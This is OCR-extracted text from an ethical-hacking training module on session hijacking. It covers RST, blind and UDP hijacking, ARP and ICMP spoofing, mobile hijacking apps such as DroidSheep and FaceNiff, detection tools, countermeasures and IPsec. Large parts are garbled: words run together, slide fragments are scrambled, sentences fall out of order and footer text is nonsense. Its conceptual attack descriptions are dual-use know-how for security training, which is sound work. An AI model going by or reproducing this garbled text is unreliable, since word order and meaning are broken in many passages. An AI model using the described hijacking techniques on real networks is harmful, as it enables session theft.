packets to insert into a TCPsession.First, an attackerspoofs a trustedhost'sIPaddress s o that
the server managinga sessionwith the hostacceptsthepackets fromtheattacker.Thepackets
are source routed; therefore, the senderspecifies the pathfor packets fromthe source to the
destinationIP. Byusingthis source-routing technique, attackersfool the server into believing
that it is communicating with the user.
After spoofing the IP address successfully, the hijacker alters the sequence and
acknowledgment numbers.Oncethese numbersa re changed, the attackerinjectsforged
packetsinto theTCPsession beforethe clientcan respond. Thisleadsto a desynchronizedstate
becausetherethe sequenceand ACKnumbers a re not synchronized.Theoriginal packets are
lost,andthe server receives a packet
with the new ISN.Thesepackets are source routed to a
patched bytheattacker.
destinationIP addressspecified

ical andCountermensores
Mackin ©by E-Comel
Copyright
 RSTHijacking
AS Thjpehng
wolves injecting looking
a authentic reset(RST) wingspoofed source
packet adress and
theacknowledgment
predicting number

believe
The vcimwould thatthesource set thereset packet,
andresettheconnection

peanate
RSTHijacking
RSThijacking a n authentic-looking
involvesinjecting reset (RST)
packet
byusing a spoofed
source IP andpredicting
address the acknowledgment
number.Thehackercan reset the
victim'sconnection if it usesan accurate acknowledgment
number.Thevictim believesthat the
source hassent the reset packet and resetsthe connection.RSThijacking
can be performed
Usingpacket-crafting toolssuchas ColasoftPacketBuilderand TCP/IPanalysistoolssuchas
‘tcpdump.

sso SBR ace

192.168.0200

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Blind and UDPHijacking

|@Anatackercan
Blind

inject
Hijacking
data Hijacking
or || before
UDP
malicious commands @ Anetworkleve sestonhijackingwhere

theaserver
into te interespted
communication n the T O?
sesion even i caabed
the source routing intended replies toi

|@ T h estacker
hasino access can
sendor forged
reiy
tose theresponse attack
the data commands but (©Theattackeruses mansinthesmiddle to
Intaceptthe servers esponcetthe cent and
sends

} |ae
Blind Hijacking
In blind hijacking,an attacker can inject maliciousdata or commands into intercepted
communicationsin a TCPsession,even if the victim disables source routing.Forthispurpose,
the attackermust correctly guess the next ISN of a computer attemptingto establisha
connection. Althoughtheattackercan sendmalicious data or a command, suchas a password
settingto allow accessfrom anotherlocationon the network, the attackercannot view the
response. To beableto view the response,an MITM attackis a muchbetteroption.

‘Sends
a request
totheserver Attacker
Intercepts

UDP Hijacking
11.2: Figure Bindhacking
process

TheUserDatagram Protocol(UDP) doesnot use packetsequencing or synchronizing.

Therefore,
a
UDPsession
is easyto modify
forges reply
a server
easily
TCP respond.
UDP
can beattacked m ore thana session.Because is connectionless,

to a clientUDP request
In networklevelsessionhijack,
datawithout the victim noticing.
beforethe server can Thus,
it
the hijacker
the attacker

ical andCountermensores
Mackin ©by E-Comel
Copyright
takescontrolofthesession.No packets
are exchanged
betweentheserver andclient,
because
theserver’s acknowledgement
sequencenumberfailsto matchthe client’s number.
server'sreplycan be easily
‘The restrictedif sniffing
is used.An MITM attacki n UDP hijacking
can minimize the taskof the attackerbecause replyfrom reaching
it can stopthe server’s the
first
clienti n the place,
nt sends UOP
request

Po response
Attacker
soilsthe
trafic

attacker

11.25:
Figure
aUDP Making session

ical andCountermensores
Mackin ©by E-Comel
Copyright
 In
this
attack,the packet

changes
Amattacker
sifer
the defaultgateway the
is used
client
as an interface
between
machineandattempts
of the client's to reroute
andserver

Thepacketsbetweenthe cientand
as shown
two techniques, below: through
the
severare routed hijackers
hostusing

Forged
Intornet Control
Protocol(CMP) MessageAadrors
Rosotution
(ARP) Protocol Spoofing

©tisan extensionofto senderrr messages

wineretheattackercan sendmessages
theclienta ndserver
is
to fool addresses
thenetworklayer
©ARP used tomap
to linklayer
(Paddress
(ac address)
addresses

MITM
Attack
Using
‘An
Forged
packet
MITM attackuses a
ICMPandARPSpoofing
snifferto interceptcommunication betweena andserver.
client
Theattackerchanges
the defaultgateway of the client’s
machine and attemptsto reroute
packets.
Thepackets
betweenthe clientand server are routed through
the hijacker’s
hostby
Usingthe following
two techniques.
=
ForgedInternet ControlMessage (ICMP)
Protocol
TheInternetControlMessage Protocol(ICMP) is an extension of IPusedto senderror
messages. An attackercan use ICMPto sendmessages to fool the clientand server. In
this technique,ICMPpackets are forgedto redirecttrafficbetweenthe clientandhost
through the hijacker’s
host. The hacker'spackets send error messages indicating
problems i n processingpackets through the originalconnection. Thisfoolsthe server
andclientinto routingthrough the hijacker’s
pathinstead.
ResolutionProtocol(ARP)
‘Address Spoofing
Hostsuse AddressResolution Protocol (ARP)tables to map local network layer
addresses(IPaddresses) to hardwareaddresses or MAC addresses. Thistechnique
fooling
involves
sendingforged
thehostbybroadcasting
ARPreplies.
ARPrequest
Theattackersendsforged
tablesof the hostthat is broadcasting
the
andchanging
ARPreplies
ARP requests.
its ARPtablesby
that update the ARP
Thisroutesthe trafficto the
attacker'shostinsteadof the legitimate
IPaddress.
In both techniques,
an attackerroutes the packets
i n transit betweenthe clientand server

their
through machine,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Flow

[NetworkLevel Session
01 mijacking
Session Concepts 03 Hijacking

02, Replication
Level
Hijacking
Session
04
~Session
Hijacking
Tools
05 Countermeasures

SessionHijacking
Tools
Burp
| an and
SurS ute allow atacternsec modly

SessionHijacking
Tools
Attackers ZAP,and bettercap
c an use toolssuchas BurpSuite,OWASP to hijack
a session
various tools that help
betweena client and server. Thissection discusses perform
session
hijacking.
=
BurpSuite
Source:https://portswigger.net

ical
Mackin
and ©byCountermensoresCopyright
E-Comel
Burp Suiteis an integrated
platform testingofwebapplications.
forthe security It allows
attackersto inspectandmodify
trafficbetweena browserandtargetapplication.
Suitecontainsthe following
Burp keycomponents.
© An intercepting andmodify
proxy,whichallowsthe user to inspect trafficbetween
their browserandthe targetapplication
application-aware
‘An thatcrawlscontent andfunctionality
spider
advancedwebapplication
‘An scanner that automatesthedetection
of numerous
typesof vulnerability
‘An
intruder tool for performing
powerful
customizedattacksto find and exploit
unusualvulnerabilities
tool for manipulating
A repeater andresending individualrequests

sequencer
‘A
tool for testingthe randomness
CSRFPoC Generator function,
‘The
of session tokens
which generates proof-of-conceptcross-site
requestforgery (CSRF) attacksfor a givenrequest
shownin the figure,
‘As attackersc an use thistool to capture
andlater use that cookieto reopena closedsession
of
the of
a session cookie a victim
victim.

Attackershijack
thecookies
andreopen
the
last closed
sesion of th

11.26Screenshot
Figure of furpSuite

ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing sessionhijacking
are some additional tools:
+
ZAP(httpsi//www.owasp.ora)
OWASP
+
bettercap
(https://www.bettercap.org)
+
netooltoolkit (https://sourceforge.net)
WebSploit (https://sourceforge.net)
Framework
(https://pypl
sslstrip python.ora)

Module
8 1428
Page tical MakingandCountermensores
by
Copyright©
Comet
 Session Hijacking
Tools for Mobile Phones CE
DroidSheep DroidSnitt FaceNitt

BZES
pRB
SessionHijackingTools for Mobile Phones
+
Droidsheep
Source:https://droidsheep.info
tool is usedfor sessionhijacking
TheDroidSheep on Androiddevicesconnectedto a
common
anduses it to accessa
observethe activities of authorizedusers on
of
wirelessnetwork.It obtainsthe session ID active
user. A DroidSheep
websiteas an authorized
websites.It
users on
user can easily
can alsohijack
the Wi-Finetwork

socialaccounts
byobtainingthe sessionID.

Figure
11.27:
Screenshot
of Droisheep

ical andCountermensores
Mackin ©by E-Comel
Copyright
Droidsniff
Source:https://github.com
DroidSniffis analysis
an Androidapp for security i n wireless
networksthat can capture
Facebook, andotheraccounts.Thistoolis usedfortestingthe security
Twitter,Linkedin,
of user accounts. It identifiesthe poor of network connections
securityproperties
without
encryption.

Figure
23.28Screenshot
ofBrian
FaceNiff
Source:http://faceniff
ponury.net
FaceNiff
cover
is an Androidapp

can hijack
that to
allowsa user sniff andintercept web-session
the WiFinetworkthat the user'smobiledeviceis connectedt o. Although
s essions onlywhen the WiFi networkdoesnot use the Extensible
profiles
FaceNiff

AuthenticationProtocol(EAP),
it workson any privatenetwork,including open, Wired
EquivalentPrivacy (WEP), Wi-Fi ProtectedAccess-pre-shared key(WPA-PSK), and
WPA2-PSK networks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Flow

01
Session
Concepts
mijacking 03
[NetworkLevel Session
Fgcaig

02 Application
Lavel Session
Hijacking

Countermeasures
In general, hijacking
is adangerous attackbecausethe victim is at riskof identity
theft,fraud,
andlossof sensitiveinformation.All networksusingTCP/IP are vulnerableto thedifferenttypes
of sessionhijackingattacksdiscussed earlier.However,following bestpractices mightprotect
againstsession hijackingattacks.
Thissectiondiscusses sessionhijacking
detectionmethods, sessionhijacking
detectiontools,
various countermeasures to combat session hijacking attacks, and approaches causing
vulnerability
to session hijacking
andtheir preventative (IPsec)
solutionssuchas IP Security

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SessionHijacking
DetectionMethods

Detection
Method

oH
ManualMethod Method
‘Automatic

Packet
Using Intrusion
Detection
sitingSoftware ‘Sytems
(IDS)

Introsion
Prevention
‘rates
(5)

SessionHijacking
DetectionMethods
Sessionhijacking
attacksare exceptionally
difficult to detect,
and users often overlookthem
unless
theattacker causessevere damage.
Thefollowing
are some symptoms ofa sessionhijacking
attack:
*
Aburstof networkactivityfor some time,whichdecreasesthe systemperformance
=
Busy
servers resulting requests by
from sent boththeclientand hijacker
Methodsto detectsession hijacking
DetectionMethod

|
‘Manual
Method ie Method

Packet
Using IntrusionDetection
Sniffing
Software Systems
(10S)

IntrusionPrevention
(IPS)
Systems
11.30:S essonhacking
Figure detectionmethods

ical andCountermensores
Mackin ©by E-Comel
Copyright
=

Manual Method
Themanualmethodinvolvesthe use of packet sniffing
softwaresuchas Wiresharkand
SteelCentralPacketAnalyzer to monitor session hijackingattacks.The packetsniffer
packets
captures in transit across the network, whichis then analyzedusingvarious
filtering
tools.
ForcedARPEntry
replacing
A forcedARPentryinvolves the MACaddressof a compromised machine in

of
the ARPcache the server with a different one i n order to restrict networktraffic to
thecompromised machine,
forcedARPentryshouldbe performed
‘A in the caseof the following:

Repeated
ARPupdates
©.

0
Framessent betweentheclientand
ACKstorms
server withdifferentMACaddresses

Method
‘Automatic
The automatic methodinvolvesthe use of an intrusion detectionsystems (IDS)and
intrusion preventionsystems(IPS) to monitor incomingnetworktraffic. If the packet
matchesany of the attacksignatures i n the internal database,
the IDSgenerates an
alert,whereasthe IPSblocksthe trafficfromentering thedatabase.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 againstSessionHijacking
Protecting
acre
hal
SSH treater communi
Yo

sesson roses
Implement
timeout
destroy
the verity
website wheneied
Enable 0 utes

Protecting SessionHijacking
against
Use

+
Secure
Shell
the
(SSH) communication
channel. tocreate a secure

ass authenticationcookiesover HTTPSconnections.

Implementthefunctionality
forthe
log-out user to endthesession,
by
Generatea sessionID aftera successful
loginandaccept
sessionIDsgeneratedthe

server
only. encrypted implement defense-in-depth
Ensure that data in transit are and the
mechanism.
Usestringsor long randomnumbersas session keys.
Usedifferentusernames andpasswords for differentaccounts.
Educate employeesandminimize remoteaccess.
Implement
()
timeout to destroy
Avoid including
sessionswhenexpired
the sessionID i n theURLor querystring
Useswitches
ratherthanhubsandlimit incoming connections.
Ensureclient-sideandserver-side softwareare
protection in the active state and up to
date.
Usestrongauthentication(such
as Kerberos) virtual privatenetworks
or peer-to-peer
(VPNs).
Configure internalandexternalspoof
appropriate ruleson gateways

ical andCountermensores
Mackin ©by E-Comel
Copyright
UseIDSproducts formonitoring
or ARPwatch ARPcachepoisoning
Useencrypted
protocols
availablei n the OpenSsH
suite
Usefirewallsandbrowsersettings
to confinecookies,
Protect authentication
cookieswith SSI.

Regularly
update
platform to fix TCP/IP
patches (e.g.,
vulnerabilities predictable
packet
sequences).
UseIPsecto session information
encrypt
UseHTTPPublicKey (HPKP)
Pinning to allowuserstoauthenticate
webservers.
Enable to verify
browsers websiteauthenticity
usingnetworknotaryservers.
Implement
DNS-based
authenticationof namedentities.
Disablecompressionmechanisms
of HTTPrequests.
Use cipher-chaining
block(CBC) ciphers randompadding
incorporating up to 255 bytes,
therebymaking
theextraction ofconfidential
informationdifficultforan attacker,
Restrictthe cross-sitescripts forgery
knownas cross-siterequest (CSRF)
fromthe client
side,
Upgrade
webbrowsers
to thelatestversions
Usevulnerability
scanners suchas masscan to detect any insecure configuration
of
HTTPSsession settings
on sites.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Guidelines to Prevent SessionHijacking
Web Development

ste TTPO es o eson Os

Web Development
Guidelines to Prevent SessionHijacking
‘An hijacks
attackerusually a session byexploitingthe vulnerabilitiesi n mechanisms
usedfor
sessionestablishment.
Web developers oftenignoresecurity.During the development process,
web developersshouldconsiderthe followingguidelinesto minimize/eliminate the risk of
sessionhijacking,
=
Createsessionkeys with lengthy stringsor randomnumbersso that it is difficultfor an
attackerto guessa validsession key.
Regenerate login
thesessionID aftera successful to prevent sessionfixationattacks.
thedataandsessionkeytransferred
Encrypt betweenthe user andwebservers,
Implement
theSecureSockets Layer(SSL) allthe informationi n transit via the
to encrypt
network.
Makethesessionexpireas soonas theuser logs
out.
Preventeavesdropping
withinthenetwork.
Reduce
the life spanof a session or cookie.
Userestrictive cachedirectivesfor all the webtraffic through
HTTPand HTTPS,
suchas
the“Cache-Control:
no-cache, no-store―
and“Pragma: no-cache―
HTTPheadersand/or
equivalent
METAtagson all or (atleast)
sensitive web pages.
Do not create sessions for unauthenticated
users unless
necessary.
Ensure
HTTPOnly
while
flag
Usea secure
usingcookiesforsessionIDs
to sendcookiesin HTTPS requests thembeforesending
and encrypt
across the network,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Check whetheralltherequests
receivedforthecurrent sessionoriginate
fromthe same
IP address
anduser agent.
Implement continuous deviceverificationto identify
whetherthe user whoestablished
the sessionis stil i n control.
Implement
risk-basedauthenticationat different levelsbefore grantingaccess to
sensitive information.
Performauthentication
andintegrity
verification
betweenVPNendpoints.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebUserGuidelinesto PreventSessionHijacking

Ensurethatthe webstecetiiedbythecertivngauthorises

Web User Guidelines to Prevent SessionHijacking

Thefollowing
are some guidelines sessionhijacking.
forwebusersto defendagainst
=
Donot clickon linksreceivedthrough (IMs).
emailsor instant messages
Use firewallsto preventmaliciouscontent fromentering
the network,
+
Usefirewalls
Ensure
and
browser
settings
restrict
by
that thewebsite
cookies.
certifying
to
is certified appropriate authorities.
Ensurethat the history,
offlinecontent,andcookies
are cleared
fromthe browserafter
every confidentialandsensitive transaction,
Give preferenceto HTTPS, a secure transmission protocol,
sensitive andconfidentialdata
over
HTTP whentransmitting

Logoutfrom the browserbyclicking

on the logout button insteadof closing the
browser.
Verify
anddisable s ites.Enableadd-onsonly
add-onsfromuntrusted if necessary.
Practiceusing a one-time password for criticaldata transactions (e.., credit card
transactions).
Frequentlyupdate anti-virus signatures
to preventtheautomatic installationofmalware
that attemptsto stealcookies.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SessionHijacking
DetectionTools
salt
| “oon eto m Wireshark | intcatne
browse
the
ae

SessionHijacking
Detection Tools
Session hijacking
attacksa re difficult andi n most cases,attacksgo unnoticed,
to detect, causing
severe leakage
of confidentialdata.Toolssuchas packetsniffers,
IDSs,andsecurity
information
andevent management (SIEM) can beusedto detectsessionhijackingattacks.
=
AlientVault
USM
Source:https://www.alienvault.com
AlienVault Unified SecurityManagement (USM) offers powerfulthreat detection,
incidentresponse, andcompliancemanagement acrosscloud,on-premises, and hybrid
environments. Securityprofessionals
can use this tool for detecting
session hijacking
attemptsandperform asset discovery,
intrusion detection, automation,SIEM
security
and log management, endpoint detectionand response, threat detection,threat
intelligence,
andvulnerability
assessment.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 2.33k
on 2.33kK.n0*

Figure
11.1: Screenshot
ofAlentvauitUSM

Module8 1440
Page ical andountermessre
Mackin Coy recounet
 =
Wireshark
Source:https://www.wireshark.org
andinteractively
Wiresharkallowsusers to capture browsethetrafficon a network.This
tool uses Winpcap Therefore,
packets.
to capture it can onlycapture packets
on the
networkssupported byWinpcap. live networktraffic from Ethernet,
It captures IEEE
802.11, Point-to-PointProtocol/High-level
DataLinkControl(PPP/HDLC), Asynchronous
TransferMode (ATM),
Bluetooth,UniversalSerialBus(USB),
TokenRing,
FrameRelay,
and FiberDistributedData Interface(FODI) professionals
networks.Security use
Wiresharkto monitor anddetectsessionhijacking
attempts.

A Nope Ager

Ei Jtewnn. +

ona" Standard
query
ofan)
4A
wp
ured

urea
une

une
co —_Sa

Shas
seart
«wD

Seart
(Ack)
hen}
eaelae

Aine

eheret
TE0:00:08
90:0;
Srey
(s80:0,400008),
00 sts 0000;00,0:680 (o8,0:60:0:00:00)

Figure11.32:
Screenshot
of Wireshark
Thefollowing
are some additionalsession hijacking
detectiontools:
=
Check Blade(https://www.checkpoint.com)
PointIPSSoftware
=
(hetps://logrhythm.com)
LogRhythm
=
SolarWinds (https://www.solarwinds.com)
Log& EventManager
=
IBM Security
NetworkIntrusion PreventionSystem
(https://www.ibm.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Approaches
Causing to SessionHijacking
Vulnerability and
their PreventativeSolutions

‘pens
or
sh (Secure
Shel)Coveyeoaypteos seton hace

Sstsecreoct ayerlor
Transport
‘TiS

sec
ayerSeay) aguas

repent
thechances
of ccs

chingbysecrin communes
ak

St
sw
ServerMessagecass kero he secity fhe
SM the
etn ae rece chances

Approaches
Causing to SessionHijacking
Vulnerability andtheir Preventative
Solutions
Implementing encryption and signing protocols preventsattackersfrom hijacking
sessions.
Belowtable lists various issues and their respectivesolutionsthat,upon implementation,
preventor impede the hijackingofa validsession.

Solution it It sendsencrypted
Notes
dataandmakes difficultfor an
‘Secure
| to
Shell(SSH) attacker sendcorrectly
or OpenSSH encrypted
session is
dataif
jacked.

SSH |
Statement
thesethe
FTP(SFTP), Applicability

2(AS2), Plementing
implementing
managed_| protocolsreduces
theseprotocols the ch
reduces chance

SaarLayer
(SS)
or
aeaaee||
SecureSockets
cae pra)
ofa succesfulhijack
F chances
i reducesthe

hijacking
Ttprevents bysecuringIP
® IPsec
communications.

AnyRemote
‘Connection
| VPNsPPTP, Implementingencrypted suchas
Virtualprivatenetwork(VEN)2 ProtocolTunneling
connections
(L2PT),
Layer
for remote
andIPsec,
session hijacking
prevents
ServerMessage
ok tewey security
SMBsigning
It improvesthe
reducesthechances
IRmitigates
of the SMBprotocol
and
of session hijacking,
theriskofARPspoofing andother
HubNetwork Switchnetwork session hijacking
attacks.

session
hacking
Table11.1:Approaches vulnerability
causing to andther preventative
solutions

Module8 1482
Page
© ical andCountermensores
Mackin Copyright
by E-Comel
 to PreventSessionHijacking
Approaches
TTP
Strict
Transport
Security
(HSTS)

FTP PublicKoyPinning
(HPKP)

to PreventSessionHijacking
Approaches
‘=
HTTPStrictTransport
Security
(HSTS)
Security
HTTP Strict Transport (HSTS) policythat protectsHTTPS
is 2 web security
websitesagainstMITM attacks.TheHSTSpolicy
helpsweb servers forcewebbrowsers
to interact with themusingHTTPS. Withthe HSTS policy,
all insecure HTTPconnections
are automatically convertedinto HTTPSconnections. Thispolicy ensures that all the
communication betweena web server and web browseris encrypted and that all
that are delivered
responses froman authenticatedserver.
andreceivedoriginate

HTTPS
Request
‘Web
Server
dient

TokenBinding
Whena user logsinto a web application,
a cookiewith a session ID,calleda token,
is
generated.
Theuser utilizesthisrandom
resources.An attackerc an impersonate
and reusinga valid session ID. Tokenbinding protects
to
tokento sendrequests theserver andaccess
the user andhijack the connection bycapturing
client-servercommunication
againstsessionhijacking attacks.Theclient creates a public-private keypair forevery
connection to a remote server. Whena client connects to the server, it generates a
signature usinga privatekeyandsendsthis signature along with its public
keyto the
server. Theserver verifiesthe signature public
usingthe client’s key.Thisensures that
ical andCountermensores
Mackin ©by E-Comel
Copyright
the message was sent byan authenticclientbecause onlytheclienthasits privatekey.
Evenif an attackercapturesthe signature,it is not possible
for themto regeneratethe
signatureor reuse it foranotherconnection. Foreverynew connection,a new pair of
public
keys
andprivate are used.

browser―
‘Web > Web Server

HTTPPublic (HPKP)
KeyPinning
HTTPPublicKey Pinning (HPKP) is a trust on first use (TOFU)technique usedi n an HTTP
headerthat allowsa web client to associatea specific publickeycertificatewith a
particularserver to minimize the riskof MITM attacksbasedon fraudulentcertificates.
In TLS sessions,to verifythe authenticity of a server'spublic key,the publickeyis
enclosedi n an X.509digital certificate,whichis signed bya certification
authority (CA)
Bycompromising any CA,attackerscan perform MITM attackson various TLSsessions.
HPKP
keys
protects
server's
TLS
sessions totto
certificate
tweb
he
fromsuchattacks
heserver,
ownedbya webserver. Whenthe clientconnects
in the certificate
bydelivering clientthe list ofpublic
chainobtainedusingHPKP.
it verifiesthe
If the server sendsany
unidentifiedpublic key,theclientissues a warning messageto the user.
‘Send usingHPRP
PublicKeys

ical andCountermensores
Mackin ©by E-Comel
Copyright
 to PreventMITM Attacks
Approaches
Encryption
‘WEP/WPA

\WEP
WORand
protec
the
traffic
ae
that
theiferet wirelessprotools
t hatar intended
to isnt andrecive by

Te
can ofthese
implementationprotocols thwartunwanted

PN
tothe newark
urs connecting ad MITEtacks
prevent

Theof
VPN
inthe
newark
prevents
attackers
decrypting
data
mplementaion
between
the
endpoints fam he flowing

to PreventMITM Attacks
Approaches
Man-in-the-middle(MITM) attacksare the most common attacksi n whichthe attackerscan
thetrafficbetween
intercept Thevictimmaynot realizetheeffectofthisattack,
two endpoints.
becauseit is mostly the detectionof MITM attacksis difficult,
passivein nature. Because they
can onlybe preventedusingvarious measures.Thefollowing are some approaches to prevent
MITM attacks:
‘=
WEP/WPA
Encryption
Wired Equivalent (WEP)
Privacy and WirelessProtectedAccess(WPA) are wireless
protocolsthat are intendedto protectthe trafficthat is sent andreceivedbyusersover
a wirelessnetwork.Theimplementation of theseprotocols can thwartthe attempts of
unwantedusers to connect to the network.A weak encryption mechanism enables
attackersto bruteforcecredentialsand enter the targetnetworkto perform an MITM
attack
VPN
AVPN creates a safeand encrypted tunnelover a public
networkto securelysendand
It creates a subnetbyusingkey-based
receive sensitive information. encryptionfor
secure communication between endpoints. The implementationof a VPN i n the
networkprevents fromdecrypting
attackers the dataflowing
between the endpoints.

‘Two-Factor
Authentication
Two-factorauthenticationprovidesan extra layer
of protection
becauseit serves as a
vector of authentication i n addition to a user's password. Therefore, the
implementation of two-factorauthenticationcan preventattackersfromperforming
session hijacking
and bruteforcing
to compromise a user’s
account.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IPSec
(©Pec isa
encrypting bythe
IETF
suite developed
protocol
eachIPpacket
ofa communicationsession
byauthenticating
forsecuringIPcommunications and

(©
tis deployed
networks
VPNsandforremote user
widelyto implement access through
diaLup
connection
ta private

Components
of IPsec Benefits of IPSec

Incernet
Key (KE)
Exchange
Dita authentication
origin

Protocol
‘Management
oakey
Dat ite
Ditaconieriaty (encryption)

IPSec (Cont'd)
of IPsec
‘Modes IPsecArchitecture

‘rama
mad ecuion

ny
( {5 Protea

|
“Aen―
Â¥

IPsec
Internet Protocol
Security (IPsec)
is a set of protocolsthat the Internet Engineering
TaskForce
(IETF)developed to supportthe secure exchange of packets at the IP layer.
It ensures
interoperablecryptographically
basedsecurity forIPv4and IPv6,and it supportsnetworklevel
peer authentication,
dataoriginauthentication, dataintegrity,dataconfidentiality
(encryption),
andreplay usedto implement
Itis widely
protection. VPNsandforremote user accessthrough

ical andCountermensores
Mackin ©by E-Comel
Copyright
dial-upconnection to privatenetworks.It supports transportand tunnelencryptionmodes,
althoughsending andreceiving devicesmust sharea public
key.
IPsec policies
can be assigned throughthe Group configuration
Policy of Active Directory
domains,organizational
units, and IPsec deployment at the domain,site,
policies or
organizational-unit services offeredbyIPsecincludethe following:
level.Thesecurity
Rejectionofreplayed packets
(aformof partial sequence integrity)
+

+
confidentiality
Data
(encryption)
Access control
Connectionless
integrity
Data originauthentication
Dataintegrity

+
traffie-flow
Limited confidentiality
Networklevel peer authentication
+

Replay protection
At the IP layer,
IPsecprovides services,offering
all the above-mentioned the protectionof IP
and/or
upper-layer suchasTCP,
protocols ICMP,
UDP, Protocol(BGP)
andBorderGateway
Components
of IPsec
IPsec driver: Softwarethat performs functionsrequired
protocol-level and
to encrypt
decrypt packets.
Internet KeyExchange (IKE):
An protocol
that produces
securitykeys
for IPsecandother
protocols.
AssociationandKeyManagement
Internet Security Protocol(ISAKMP):
Softwarethat
to communicate byencryptingthe data exchanged
allowstwo computers between
them.
Oakley:A protocolthat usesthe Diffie-Hellmanalgorithm to create a master keyanda
keythat is specific
to eachsession i n IPsecdatatransfer.
IPsecPolicy A service included
Agent: OSthat enforces
i n Windows IPsecpolicies
for all
the networkcommunicationsinitiatedfromthat system,
Thefollowing
are the stepsinvolvedi n the IPsecprocess.
*
Aconsumer sendsa message to a service provider.
=
Theconsumer's IPsecdriverattemptsto matchthe outgoing packet's address or the
packettypeagainst the IPfilter.
The IPsec driver notifies ISAKMPto initiate securitynegotiations
with the service
provider.
Theservice provider's
ISAKMPreceives the security
negotiation
request.
ical andCountermensores
Mackin ©by E-Comel
Copyright
 Bothprinciples
initiate a key
anda sharedsecret key.
establishing
exchange, ISAKMPSecurity
an (SA)
Association

Bothprinciples
discuss
IPsecSAsandkeys.
the securitylevel
fortheinformationexchange,
establishing
both

IPsecdrivertransferspackets
Theconsumer's to the appropriate
connection typefor
transmissionto theservice provider.
Theprovider
receives the packets
andtransfersthemto theIPsecdriver.
The provider's
IPsecuses the inboundSAand keyto checkthe digital and
signature
begin
decryption.
Theprovider's
IPsecdrivertransfers
decrypted
packets layerfor
to the OSItransport
further processing.
Modesof IPsec
Theconfiguration
of IPsecinvolvestwo differentmodes:
thetunnelmodeandtransportmode.
Thesemodesare associatedwith the functionsof two core protocols:
the Encapsulation
Payload
Security (ESP)
and AuthenticationHeader(AH). Themodelselectiondepends
on the
andimplementation
requirements of IPsec.
Transport Mode
In the transportmode (alsoESP), IPsec encrypts onlythe payload of the IP packet,
leaving the headeruntouched,It authenticates two connectedcomputers and provides
the optionof encrypting datatransfer.It is compatible
with networkaddresstranslation
(NAT); therefore,
it can beusedto
provide VPNservices for networksutilizing
NAT.

“Internet

an
~
Transportmodeencapsulation
en er
eacer
< | |(ree,
<<
uoP,
header
ste)
encrypted
ererpted >

TunnelMode
Figure
11.36:
mode
encapsulation
Transport

In thetunnelmode(also
AH),the IPsecencryptsboththe payload
andheader.Hence, in
thetunnelmodehashighersecurity thanthe transportmode.Afterreceivingthe data,
deviceperforms
the IPsec-compliant decryption.Thetunnel modelis usedto create
VPNsover the Internetfor network-to-networkcommunication (e.g,,
betweenrouters
andlink sites),
host-to-networkcommunication (e.g.,
remote user
access),
andhost-to-

ical andCountermensores
Mackin ©by E-Comel
Copyright
 hostcommunication (e.g,,
privatechat). with NATandsupportsNAT
It is compatible
traversal.
In the tunnel mode, the system entire IP packets
encrypts (payload and IP header)
and
encapsulates the encrypted packets
into 2 new IP packet with a new header.In this
mode,ESPencrypts and optionally
authenticatesentire inner IP packets,whereasAH
authenticates entire inner IP packets
andselectedfieldsof outerIPheaders.Thetunnel
modeis usually usefulbetweentwo gateways or betweena hostandgateway.

Tunnel modeencapsulation
-

|
Made enter

IPsecArchitecture
IPsecoffers security services at the network layer. Thisprovidesthe freedomto selectthe
required securityprotocols as well as the algorithms usedfor services. To provide the
requested services,the corresponding cryptographic keyscan be employed, if required
Security services offered by IPsec include access control,data origin authentication,
connectionless anti-replay,
integrity, To meet theseobjectives,
and confidentiality. IPsecuses
two traffic securityprotocols,AH and ESP, as well as cryptographic
keymanagement protocols
andprocedures.
protocol
‘The
‘=
of
structure the IPsecarchitectureis asfollows.
AuthenticationHeader(AH):It offers integrityand data origin authentication,
with
optional
anti-replay
features.
Encapsulating
Security (ESP):
Payload It offersall the services offeredbyAH as well as
confidentiality.
IPsecDomain of Interpretation(DOI): It definesthe payload formats, typesof
exchange,
and namingconventions for securityinformationsuch as cryptographic
algorithms
or securitypolicies.
IPsecDOI instantiates ISAKMPfor use with IP when IP
usesISAKMPto negotiate
security
associations.
Internet Security Associationand KeyManagement Protocol(ISAKMP): It is 2 key
protocol the required
in the IPsecarchitecturethat establishes for various
security
communications over the Internet, such as government,private,and commercial

ical andCountermensores
Mackin ©by E-Comel
Copyright
communications,by combining the securityconceptsof authentication,
key
andsecurity
management, associations.
Policy:
IPsec policies
are usefuli n providing They
network security. definewhenand
howto secure data,a s well as security
methodsto use at differentlevelsin thenetwork.
can configure
‘One

site,
IPsecpolicies
organizational
unit, andso on
to meet the security
of
requirementsa system,domain,

v
se
Architecture
Wane

.
J oo

v
| An Protoct

y
ESP
Protocol

“%
Authentication
Algorithm

a
=
> KeyManagement

11.38IPsecarchitecture
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IPsecAuthenticationand Confidentiality

1 sec uses

authentiation
two diferent

and
confidentiality

Provides
Pond (ESP: both

tncrypton(oni) of

IPsecAuthenticationand Confidentiality
IPsecuses two differentsecurity andconfidentiality.
services for authentication
+
AuthenticationHeader(AH): It is usefuli n providing
connectionless anddata
integrity
origin authenticationfor IP datagrams andanti-replay protectionforthe data payload
and some portionsof the IP headerof eachpacket. However,it doesnot supportdata
confidentiality(noencryption). A receiver can selectthe service to protectagainst
replays,whichis an optional service on establishing association(SA).
a security

EncapsulationSecurity
Payload (ESP): In addition to the services (dataorigin
authentication, integrity,and anti-replay
connectionless service)
providedbyAH,the
ESPprotocol offers confidentiality.Unlike AH,ESPdoes not provide integrityand
authenticationforthe entire IP packetin the transport alone,
mode.ESPcan be applied
with AH,or i n a nestedmanner. It protects
i n conjunction onlythe IP datapayload
i n the
defaultsetting.nthe tunnelmode,i t protects boththe payloadandIPheader

ical andCountermensores
Mackin ©by E-Comel
Copyright
 8
Module 1452
Page tical andCountermensores
Making by Comet
Copyright©
 J
SessionHijacking
PreventionTools CEH
pi
amar |
ae ome
